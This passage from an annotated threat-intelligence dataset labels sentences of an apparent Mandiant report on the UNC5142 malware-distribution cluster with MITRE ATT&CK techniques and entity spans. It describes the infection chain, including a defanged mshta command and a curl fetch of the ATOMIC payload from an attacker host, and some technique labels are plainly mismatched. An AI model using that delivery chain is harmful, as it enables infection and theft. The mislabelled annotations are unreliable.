"context_before": "May 2025:\nAn \"Anti-Bot Lure\" was observed, presenting another variation of a fake verification step (Figure 14).", "sentence_text": "On-Chain Analysis\nGTIG\ntracks as the Main and Secondary infrastructures.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s108-ac7847", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "On-Chain Analysis\nGTIG\ntracks as the Main and Secondary infrastructures.", "sentence_text": "Both serve the same ultimate purpose, delivering malware via the CLEARSHORT downloader.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deliver malware via CLEARSHORT downloader", "entities": [ { "text": " CLEARSHORT downloader", "start": 64, "end": 86, "label": "MalwareTool" }, { "text": "delivering", "start": 38, "end": 48, "label": "Action" }, { "text": " malware ", "start": 48, "end": 57, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s109-3d7bf8", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "Both serve the same ultimate purpose, delivering malware via the CLEARSHORT downloader.", "sentence_text": "It is highly likely that the actor cloned their successful Main infrastructure to create the foundation for Secondary, which could then be updated via subsequent transactions to deliver different payloads.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1584.007", "name": "Serverless" } ], "procedure": "Clone Main infrastructure to create Secondary infrastructure for payload delivery", "entities": [ { "text": "actor", "start": 29, "end": 34, "label": "ThreatActor" }, { "text": "cloned ", "start": 35, "end": 42, "label": "Action" }, { "text": " successful Main infrastructure", "start": 47, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "create", "start": 82, "end": 88, "label": "Action" }, { "text": " updated", "start": 138, "end": 146, "label": "Action" }, { "text": "deliver", "start": 178, "end": 185, "label": "Action" }, { "text": "payloads", "start": 196, "end": 204, "label": "MalwareTool" }, { "text": "Secondary", "start": 108, "end": 117, "label": "Infrastructure_Indicator" }, { "text": " subsequent transactions", "start": 150, "end": 174, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s110-abebb5", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "It is highly likely that the actor cloned their successful Main infrastructure to create the foundation for Secondary, which could then be updated via subsequent transactions to deliver different payloads.", "sentence_text": "Further analysis of the funding sources shows that the primary operator wallets for both groups received funds from the same intermediary wallet ( 0x3b5a...32D ), an account associated with the OKX cryptocurrency exchange.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Fund operator wallets via intermediary OKX exchange wallet", "entities": [ { "text": "OKX cryptocurrency", "start": 194, "end": 212, "label": "Infrastructure_Indicator" }, { "text": "0x3b5a...32D", "start": 147, "end": 159, "label": "Infrastructure_Indicator" }, { "text": " primary operator wallets", "start": 54, "end": 79, "label": "Infrastructure_Indicator" }, { "text": " received funds", "start": 95, "end": 110, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s111-022512", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "Further analysis of the funding sources shows that the primary operator wallets for both groups received funds from the same intermediary wallet ( 0x3b5a...32D ), an account associated with the OKX cryptocurrency exchange.", "sentence_text": "Parallel Distribution Infrastructures Transaction records show key events for both groups occurring in close proximity, indicating coordinated management.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s112-ab0636", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 112, "context_before": "Parallel Distribution Infrastructures Transaction records show key events for both groups occurring in close proximity, indicating coordinated management.", "sentence_text": "This coordinated funding activity strongly suggests a single actor preparing for and executing an expansion of their operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s113-6fd83a", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 113, "context_before": "This coordinated funding activity strongly suggests a single actor preparing for and executing an expansion of their operations.", "sentence_text": "This demonstrates concurrent campaign management, where the actor was actively maintaining and running separate distribution efforts through both sets of smart contracts simultaneously.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Maintain and run separate distribution campaigns through multiple smart contracts simultaneously", "entities": [ { "text": "smart contracts ", "start": 154, "end": 170, "label": "Infrastructure_Indicator" }, { "text": "actively maintaining and running separate distribution efforts ", "start": 70, "end": 133, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s114-c109f3", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 114, "context_before": "This demonstrates concurrent campaign management, where the actor was actively maintaining and running separate distribution efforts through both sets of smart contracts simultaneously.", "sentence_text": "Main\nNov. 24, 2024 .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s115-10e5de", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 115, "context_before": "Main\nNov. 24, 2024 .", "sentence_text": "The transaction history for Main infrastructure shows consistent updates over the course of the first half of 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s116-8947b2", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 116, "context_before": "The transaction history for Main infrastructure shows consistent updates over the course of the first half of 2025.", "sentence_text": "Following the initial setup, Mandiant observed payload and lure updates occurring on a near-monthly and at times bi-weekly basis from December 2024 through the end of May 2025.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1498.001", "name": "Direct Network Flood" } ], "procedure": "Update payloads and lures on a near-monthly to bi-weekly basis", "entities": [ { "text": " payload", "start": 46, "end": 54, "label": "MalwareTool" }, { "text": "lure ", "start": 59, "end": 64, "label": "MalwareTool" }, { "text": "updates", "start": 64, "end": 71, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s117-da0de4", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 117, "context_before": "Following the initial setup, Mandiant observed payload and lure updates occurring on a near-monthly and at times bi-weekly basis from December 2024 through the end of May 2025.", "sentence_text": "S hortly after, the entire three-contract system was deployed and configured.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.005", "name": "Exploits" } ], "procedure": "Deploy and configure three-contract system", "entities": [ { "text": "three-contract system", "start": 27, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "deployed", "start": 53, "end": 61, "label": "Action" }, { "text": "configured", "start": 66, "end": 76, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s118-af23d3", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 118, "context_before": "S hortly after, the entire three-contract system was deployed and configured.", "sentence_text": "After this initial period, the frequency of updates to the Secondary smart contracts decreased substantially.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s119-c6476c", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 119, "context_before": "After this initial period, the frequency of updates to the Secondary smart contracts decreased substantially.", "sentence_text": "The Main infrastructure stands out as the core campaign infrastructure, marked by its early creation and steady stream of updates.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s120-cb4d06", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 120, "context_before": "The Main infrastructure stands out as the core campaign infrastructure, marked by its early creation and steady stream of updates.", "sentence_text": "The Secondary infrastructure appears as a parallel, more tactical deployment, likely established to support a specific surge in campaign activity, test new lures, or simply build operational resilience.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Establish parallel Secondary infrastructure for campaign surges, testing, and resilience", "entities": [ { "text": "Secondary infrastructure ", "start": 4, "end": 29, "label": "Infrastructure_Indicator" }, { "text": " support", "start": 99, "end": 107, "label": "Action" }, { "text": "test new lures", "start": 147, "end": 161, "label": "Action" }, { "text": "build operational resilience", "start": 173, "end": 201, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s121-4a57c2", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 121, "context_before": "The Secondary infrastructure appears as a parallel, more tactical deployment, likely established to support a specific surge in campaign activity, test new lures, or simply build operational resilience.", "sentence_text": "Given the distribution of a variety of payloads over a range of time, it is possible that UNC5142 functions as a malware distribution threat cluster.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s122-0b7b50", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 122, "context_before": "Given the distribution of a variety of payloads over a range of time, it is possible that UNC5142 functions as a malware distribution threat cluster.", "sentence_text": "Distribution threat clusters play a significant role within the cyber criminal threatscape, providing actors of varying levels of technical sophistication a means to distribute malware and/or gain initial access to victim environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s123-afa7e1", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 123, "context_before": "Distribution threat clusters play a significant role within the cyber criminal threatscape, providing actors of varying levels of technical sophistication a means to distribute malware and/or gain initial access to victim environments.", "sentence_text": "While the exact business model of UNC5142 is unclear, GTIG currently does not attribute the final payloads to the threat cluster due to the possibility it is a distribution threat cluster.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s124-2ea6d4", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 124, "context_before": "While the exact business model of UNC5142 is unclear, GTIG currently does not attribute the final payloads to the threat cluster due to the possibility it is a distribution threat cluster.", "sentence_text": "An analysis of their infection chains since the beginning of 2025 reveals that UNC5142 follows a repeatable four-stage delivery chain after the initial CLEARSHORT lure:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s125-071ad0", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 125, "context_before": "An analysis of their infection chains since the beginning of 2025 reveals that UNC5142 follows a repeatable four-stage delivery chain after the initial CLEARSHORT lure:", "sentence_text": "The initial dropper:\nThe first stage almost always involves the execution of a remote HTML Application (.hta) file, often disguised with a benign file extension like .xll (Excel Add-in).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218.005", "name": "Mshta" } ], "procedure": "Execute remote HTA file disguised as .xll file", "entities": [ { "text": " remote HTML Application (.hta) file", "start": 78, "end": 114, "label": "MalwareTool" }, { "text": " execution", "start": 63, "end": 73, "label": "Action" }, { "text": " .xll (Excel Add-in)", "start": 165, "end": 185, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s126-f68354", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 126, "context_before": "The initial dropper:\nThe first stage almost always involves the execution of a remote HTML Application (.hta) file, often disguised with a benign file extension like .xll (Excel Add-in).", "sentence_text": "This component, downloaded from a malicious domain or a legitimate file-sharing service, serves as the entry point for executing code on the victim's system outside the browser's security sandbox.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download HTA dropper from malicious domain or file-sharing service to execute code outside browser sandbox", "entities": [ { "text": " malicious domain", "start": 33, "end": 50, "label": "Infrastructure_Indicator" }, { "text": " legitimate file-sharing service, serves", "start": 55, "end": 95, "label": "Infrastructure_Indicator" }, { "text": " code", "start": 128, "end": 133, "label": "MalwareTool" }, { "text": "victim's system", "start": 141, "end": 156, "label": "Infrastructure_Indicator" }, { "text": " executing", "start": 118, "end": 128, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s127-8d022b", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 127, "context_before": "This component, downloaded from a malicious domain or a legitimate file-sharing service, serves as the entry point for executing code on the victim's system outside the browser's security sandbox.", "sentence_text": "The PowerShell loader:\nThe initial dropper’s primary role is to download and execute a second-stage PowerShell script.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Download and execute second-stage PowerShell script", "entities": [ { "text": "initial dropper’", "start": 27, "end": 43, "label": "MalwareTool" }, { "text": " PowerShell loader", "start": 3, "end": 21, "label": "MalwareTool" }, { "text": "download", "start": 64, "end": 72, "label": "Action" }, { "text": "execute", "start": 77, "end": 84, "label": "Action" }, { "text": "PowerShell script", "start": 100, "end": 117, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s128-186e84", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 128, "context_before": "The PowerShell loader:\nThe initial dropper’s primary role is to download and execute a second-stage PowerShell script.", "sentence_text": "This script is responsible for defense evasion and orchestrating the download of the final payload.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1202", "name": "Indirect Command Execution" } ], "procedure": "Perform defense evasion and orchestrate final payload download", "entities": [ { "text": "script", "start": 5, "end": 11, "label": "MalwareTool" }, { "text": " defense evasion", "start": 30, "end": 46, "label": "Action" }, { "text": "orchestrating", "start": 51, "end": 64, "label": "Action" }, { "text": "download", "start": 69, "end": 77, "label": "Action" }, { "text": "final payload", "start": 85, "end": 98, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s129-8a71b5", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 129, "context_before": "This script is responsible for defense evasion and orchestrating the download of the final payload.", "sentence_text": "Abuse of legitimate services:\nThe actor has consistently leveraged legitimate file hosting services such as GitHub and MediaFire to host encrypted data blobs, with some instances observed where final payloads were hosted on their own infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Host encrypted data blobs on GitHub and MediaFire, and final payloads on own infrastructure", "entities": [ { "text": "encrypted data blobs", "start": 137, "end": 157, "label": "MalwareTool" }, { "text": "final payloads", "start": 194, "end": 208, "label": "MalwareTool" }, { "text": "were hosted", "start": 209, "end": 220, "label": "Action" }, { "text": "actor", "start": 34, "end": 39, "label": "ThreatActor" }, { "text": " own infrastructure", "start": 229, "end": 248, "label": "Infrastructure_Indicator" }, { "text": "file hosting services", "start": 78, "end": 99, "label": "Infrastructure_Indicator" }, { "text": "GitHub", "start": 108, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "MediaFire", "start": 119, "end": 128, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s130-c1a327", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 130, "context_before": "Abuse of legitimate services:\nThe actor has consistently leveraged legitimate file hosting services such as GitHub and MediaFire to host encrypted data blobs, with some instances observed where final payloads were hosted on their own infrastructure.", "sentence_text": "This tactic helps the malicious traffic blend in with legitimate network activity, bypassing reputation-based security filters.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1102.001", "name": "Dead Drop Resolver" } ], "procedure": "Blend malicious traffic with legitimate activity", "entities": [ { "text": " blend in ", "start": 39, "end": 49, "label": "Action" }, { "text": "bypassing", "start": 83, "end": 92, "label": "Action" }, { "text": " reputation-based security filters", "start": 92, "end": 126, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s131-a7c998", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 131, "context_before": "This tactic helps the malicious traffic blend in with legitimate network activity, bypassing reputation-based security filters.", "sentence_text": "In-memory execution:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s132-494a15", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 132, "context_before": "In-memory execution:", "sentence_text": "In early January, executables were being used to serve VIDAR, but since then, the final malware payload has transitioned to being delivered as an encrypted data blob disguised as a common file type (e.g., .mp4, .wav, .dat).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "Deliver encrypted payloads disguised as .mp4, .wav, or .dat files", "entities": [ { "text": "final malware payload", "start": 82, "end": 103, "label": "MalwareTool" }, { "text": " transitioned", "start": 107, "end": 120, "label": "Action" }, { "text": "delivered", "start": 130, "end": 139, "label": "Action" }, { "text": " encrypted data blob", "start": 145, "end": 165, "label": "MalwareTool" }, { "text": "executables ", "start": 18, "end": 30, "label": "MalwareTool" }, { "text": "VIDAR", "start": 55, "end": 60, "label": "MalwareTool" }, { "text": "mp4, .wav, .da", "start": 206, "end": 220, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s133-188d2a", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 133, "context_before": "In early January, executables were being used to serve VIDAR, but since then, the final malware payload has transitioned to being delivered as an encrypted data blob disguised as a common file type (e.g., .mp4, .wav, .dat).", "sentence_text": "Earlier Campaigns\nIn earlier infection chains, the URL for the first-stage .hta dropper was often hardcoded directly into the CLEARSHORT lure's command (e.g., mshta hxxps[:]//...pages.dev ).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218.005", "name": "Mshta" } ], "procedure": "Hardcode .hta dropper URL in CLEARSHORT lure command", "entities": [ { "text": " first-stage .hta dropper", "start": 62, "end": 87, "label": "MalwareTool" }, { "text": " CLEARSHORT lure", "start": 125, "end": 141, "label": "MalwareTool" }, { "text": " mshta hxxps", "start": 158, "end": 170, "label": "Infrastructure_Indicator" }, { "text": "hardcoded", "start": 98, "end": 107, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s134-4749db", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 134, "context_before": "Earlier Campaigns\nIn earlier infection chains, the URL for the first-stage .hta dropper was often hardcoded directly into the CLEARSHORT lure's command (e.g., mshta hxxps[:]//...pages.dev ).", "sentence_text": "The intermediate PowerShell script would then download the final malware directly from a public repository like GitHub.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102.002", "name": "Bidirectional Communication" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download final malware from GitHub via PowerShell script", "entities": [ { "text": " PowerShell script", "start": 16, "end": 34, "label": "MalwareTool" }, { "text": " final malware", "start": 58, "end": 72, "label": "MalwareTool" }, { "text": " download", "start": 45, "end": 54, "label": "Action" }, { "text": "public repository like GitHub", "start": 89, "end": 118, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s136-c585dc", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 136, "context_before": "January 2025", "sentence_text": "The actor’s primary evolution was to stop delivering the malware directly as an executable file.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Stop delivering malware as direct executable files", "entities": [ { "text": "The actor’", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "stop delivering", "start": 37, "end": 52, "label": "Action" }, { "text": "malware", "start": 57, "end": 64, "label": "MalwareTool" }, { "text": "executable file", "start": 80, "end": 95, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s137-04eda4", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 137, "context_before": "The actor’s primary evolution was to stop delivering the malware directly as an executable file.", "sentence_text": "February 2025 & Beyond The most significant change was the deeper integration of their on-chain infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s138-d770da", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 138, "context_before": "February 2025 & Beyond The most significant change was the deeper integration of their on-chain infrastructure.", "sentence_text": "Instead of hardcoding the dropper URL in the lure, the CLEARSHORT script began making a direct eth_call to the Third-Level Smart Contract .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Make eth_call to Third-Level Smart Contract for dropper URL", "entities": [ { "text": " CLEARSHORT script", "start": 54, "end": 72, "label": "MalwareTool" }, { "text": " dropper URL", "start": 25, "end": 37, "label": "MalwareTool" }, { "text": " Third-Level Smart Contract ", "start": 110, "end": 138, "label": "Infrastructure_Indicator" }, { "text": " lure,", "start": 44, "end": 50, "label": "MalwareTool" }, { "text": "began making", "start": 73, "end": 85, "label": "Action" }, { "text": "eth_call", "start": 95, "end": 103, "label": "Action" }, { "text": " hardcoding", "start": 10, "end": 21, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s139-834e37", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 139, "context_before": "Instead of hardcoding the dropper URL in the lure, the CLEARSHORT script began making a direct eth_call to the Third-Level Smart Contract .", "sentence_text": "The smart contract now dynamically provides the URL of the first-stage dropper.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s140-d6d06a", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 140, "context_before": "The smart contract now dynamically provides the URL of the first-stage dropper.", "sentence_text": "This demonstrates that UNC5142 uses a flexible approach, adapting its infection methods to suit each campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s141-24f88b", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 141, "context_before": "This demonstrates that UNC5142 uses a flexible approach, adapting its infection methods to suit each campaign.", "sentence_text": "Targeting macOS\nNotably, the threat cluster has targeted both Windows and macOS systems with their distribution campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Target both Windows and macOS systems", "entities": [ { "text": "macOS", "start": 10, "end": 15, "label": "Infrastructure_Indicator" }, { "text": "Windows", "start": 62, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "macOS", "start": 74, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "threat cluster ", "start": 29, "end": 44, "label": "ThreatActor" }, { "text": "Targeting", "start": 0, "end": 9, "label": "Action" }, { "text": "targeted ", "start": 48, "end": 57, "label": "Action" }, { "text": "distribution campaigns", "start": 99, "end": 121, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s142-55a64a", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 142, "context_before": "Targeting macOS\nNotably, the threat cluster has targeted both Windows and macOS systems with their distribution campaigns.", "sentence_text": "The social engineering lures for these campaigns evolved; while the initial February lure explicitly stated “Instructions For MacOS”, the later April versions were nearly identical to the lures used in their Windows campaigns (Figure 18 and Figure 19).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s143-02a09a", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 143, "context_before": "The social engineering lures for these campaigns evolved; while the initial February lure explicitly stated “Instructions For MacOS”, the later April versions were nearly identical to the lures used in their Windows campaigns (Figure 18 and Figure 19).", "sentence_text": "In the February infection chain, the lure prompted the user to run a bash command that retrieved a shell script (Figure 18).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Prompt user to run bash command that retrieves shell script", "entities": [ { "text": "infection chain", "start": 16, "end": 31, "label": "ThreatActor" }, { "text": " lure", "start": 36, "end": 41, "label": "MalwareTool" }, { "text": "prompted", "start": 42, "end": 50, "label": "Action" }, { "text": " run", "start": 62, "end": 66, "label": "Action" }, { "text": "shell script", "start": 99, "end": 111, "label": "MalwareTool" }, { "text": "bash command", "start": 69, "end": 81, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s144-2f544b", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 144, "context_before": "In the February infection chain, the lure prompted the user to run a bash command that retrieved a shell script (Figure 18).", "sentence_text": "This script then used curl to fetch the ATOMIC payload from the remote server hxxps[:]//browser-storage[.]com/update and writes the ATOMIC payload to a file named /tmp/update .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use curl to fetch ATOMIC payload from browser-storage[.]com and write to /tmp/update", "entities": [ { "text": "script", "start": 5, "end": 11, "label": "MalwareTool" }, { "text": "used ", "start": 17, "end": 22, "label": "Action" }, { "text": "ATOMIC payload ", "start": 40, "end": 55, "label": "MalwareTool" }, { "text": "remote server hxxps[:]//browser-storage[.]com/update", "start": 64, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "ATOMIC payload", "start": 132, "end": 146, "label": "MalwareTool" }, { "text": "writes", "start": 121, "end": 127, "label": "Action" }, { "text": " file named /tmp/update", "start": 151, "end": 174, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s146-6a672f", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 146, "context_before": "(Figure 20).", "sentence_text": "The use of the xattr command within the bash script is a deliberate defense evasion technique designed to remove the com.apple.quarantine attribute, which prevents macOS from displaying the security prompt that normally requires user confirmation before running a downloaded application for the first time.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Use xattr to remove com.apple.quarantine attribute", "entities": [ { "text": "xattr command", "start": 15, "end": 28, "label": "MalwareTool" }, { "text": " bash script", "start": 39, "end": 51, "label": "MalwareTool" }, { "text": " com.apple.quarantine attribute", "start": 116, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "prevents", "start": 155, "end": 163, "label": "Action" }, { "text": " defense evasion", "start": 67, "end": 83, "label": "Action" }, { "text": "macOS", "start": 164, "end": 169, "label": "Infrastructure_Indicator" }, { "text": " running a downloaded application", "start": 253, "end": 286, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s147-7b97b9", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 147, "context_before": "The use of the xattr command within the bash script is a deliberate defense evasion technique designed to remove the com.apple.quarantine attribute, which prevents macOS from displaying the security prompt that normally requires user confirmation before running a downloaded application for the first time.", "sentence_text": "The reliance on legitimate platforms such as the BNB Smart Chain and Cloudflare pages may lend a layer of legitimacy that helps evade some security detections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s148-a6e13b", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 148, "context_before": "The reliance on legitimate platforms such as the BNB Smart Chain and Cloudflare pages may lend a layer of legitimacy that helps evade some security detections.", "sentence_text": "Given the frequent updates to the infection chain coupled with the consistent operational tempo, high volume of compromised websites, and diversity of distributed malware payloads over the past year and a half, it is likely that UNC5142 has experienced some level of success with their operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s149-10c631", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 149, "context_before": "Given the frequent updates to the infection chain coupled with the consistent operational tempo, high volume of compromised websites, and diversity of distributed malware payloads over the past year and a half, it is likely that UNC5142 has experienced some level of success with their operations.", "sentence_text": "Despite what appears to be a cessation or pause in UNC5142 activity since July 2025, the threat cluster’s willingness to incorporate burgeoning technology and their previous tendencies to consistently evolve their TTPs could suggest they have more significantly shifted their operational methods in an attempt to avoid detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s150-23a919", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 150, "context_before": "Despite what appears to be a cessation or pause in UNC5142 activity since July 2025, the threat cluster’s willingness to incorporate burgeoning technology and their previous tendencies to consistently evolve their TTPs could suggest they have more significantly shifted their operational methods in an attempt to avoid detection.", "sentence_text": "Acknowledgements\nSpecial acknowledgment to Cian Lynch for involvement in tracking the malware as a service distribution cluster, and to Blas Kojusner for assistance in analyzing infostealer malware samples.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s151-868d9f", "source": "mandiant", 